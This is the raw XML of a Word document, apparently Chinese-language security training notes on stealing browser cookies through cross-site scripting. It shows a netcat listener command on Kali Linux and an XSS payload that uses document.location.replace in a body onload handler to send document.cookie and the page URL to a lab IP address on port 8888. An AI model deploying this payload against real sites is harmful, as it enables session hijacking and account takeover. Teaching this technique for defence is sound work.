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33096D" w14:textId="2ED88D95" w:rsidR="00D06572" w:rsidRDefault="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们培训 和大家讲XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大家都知道吧，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC4E2B" w14:textId="298CE52C" w:rsidR="00115B8F" w:rsidRDefault="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前几天猪哥跟我讲让我以后别讲XSS平台了，讲XSS用nc。我理解错误以为xss能nc弹shell，特别尴尬，导致我还问猪哥，被攻击者电脑上没有nc咋弹shell？是编码还是js里面写下载执行哦？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40981C" w14:textId="52183CD1" w:rsidR="00115B8F" w:rsidRDefault="00115B8F"/>
    <w:p w14:paraId="06E2052E" w14:textId="1662C58A" w:rsidR="00115B8F" w:rsidRDefault="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后猪哥给我演示了下，用nc获取xss截取到的cookie（好吧，我理解能力有丢丢问题）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640FB00" w14:textId="65EA0DDB" w:rsidR="00115B8F" w:rsidRDefault="00115B8F"/>
    <w:p w14:paraId="5F22891C" w14:textId="38B42E28" w:rsidR="00115B8F" w:rsidRDefault="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个是最原始的方式方法，确实我们在过去的培训中也没有和各位讲过，</w:t>
      </w:r>
      <w:r w:rsidR="00193D7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这里呢 先给大家补一下。后面呢也将会作为单独的一课和大家介绍下xss的历史和方式方法</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="37E3523A" w14:textId="26D647F3" w:rsidR="00115B8F" w:rsidRDefault="00115B8F"/>
    <w:p w14:paraId="74814839" w14:textId="61B35C3F" w:rsidR="00115B8F" w:rsidRDefault="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS获取cookie的方式方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6C018" w14:textId="14950FE7" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115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nc接收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7AF18" w14:textId="44AA9C35" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115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脚本接收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60377E5C" w14:textId="14FFB2BD" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115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XSS平台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078CC29" w14:textId="329C6277" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8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日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A301F" w14:textId="5B7ED791" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F"/>
    <w:p w14:paraId="2C20CA7E" w14:textId="3EA195E5" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个和第四个一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580050C0" w14:textId="1F26B86F" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F"/>
    <w:p w14:paraId="13AFE8CC" w14:textId="0419A965" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个和第三个呢 是我们培训必讲的，那么问题来了 虽然说第一个和第四个一样，但是怎么操作呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678445F4" w14:textId="04D09F42" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A495E" w14:textId="26D45B6D" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收信启动nc</w:t>
      </w:r>
      <w:r w:rsidR="00D1110D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1110D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC438BE" w14:textId="1AF243C6" w:rsidR="00D1110D" w:rsidRDefault="00D1110D" w:rsidP="00115B8F">
      <w:r>
        <w:t xml:space="preserve">Nc -lvvp  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1ECBAF" w14:textId="79DAE0E6" w:rsidR="003542F2" w:rsidRDefault="003542F2" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140ACFCE" w14:textId="67C563C0" w:rsidR="003542F2" w:rsidRDefault="00D04F19" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04F19">
        <w:t>document.location.replace("http://192.168.158.131:8888/?message="+document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8A91F" w14:textId="7B5B5074" w:rsidR="003542F2" w:rsidRDefault="00D04F19" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792A611B" wp14:editId="540E4BC4">
            <wp:extent cx="5274310" cy="182880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5D05D" w14:textId="5CF2BF7B" w:rsidR="00D1110D" w:rsidRDefault="00D1110D" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造XSS：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C2FD3" w14:textId="7583E8FF" w:rsidR="00D1110D" w:rsidRDefault="00D1110D" w:rsidP="00115B8F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>html&gt;&lt;body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7B453" w14:textId="658E035A" w:rsidR="00D1110D" w:rsidRDefault="00D1110D" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Onload=’document.location.replace(</w:t>
      </w:r>
      <w:r w:rsidRPr="003542F2">
        <w:t>http://192.168.158.131:8888/?message=+document</w:t>
      </w:r>
      <w:r w:rsidRPr="003542F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003542F2">
        <w:t>cookie+”&lt;br&gt;”+”URL</w:t>
      </w:r>
      <w:r>
        <w:t>” +document.location);’&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D48D55" w14:textId="0F031D44" w:rsidR="00D1110D" w:rsidRPr="00D1110D" w:rsidRDefault="00D1110D" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2D5AF" w14:textId="77777777" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400650E4" w14:textId="77777777" w:rsidR="00115B8F" w:rsidRDefault="00115B8F" w:rsidP="00115B8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00115B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B45A9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4D81AF4"/>
    <w:lvl w:ilvl="0" w:tplc="4DD092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73B3"/>
    <w:rsid w:val="00115B8F"/>
    <w:rsid w:val="00193D7C"/>
    <w:rsid w:val="003542F2"/>
    <w:rsid w:val="00D04F19"/>
    <w:rsid w:val="00D06572"/>
    <w:rsid w:val="00D1110D"/>
    <w:rsid w:val="00FC7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D581F5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1FF3DAA2-FB3D-4045-982B-E054BDEE95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15B8F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D1110D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111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93</Words>
  <Characters>536</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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wangai</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wangai</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-09T06:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-09T07:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>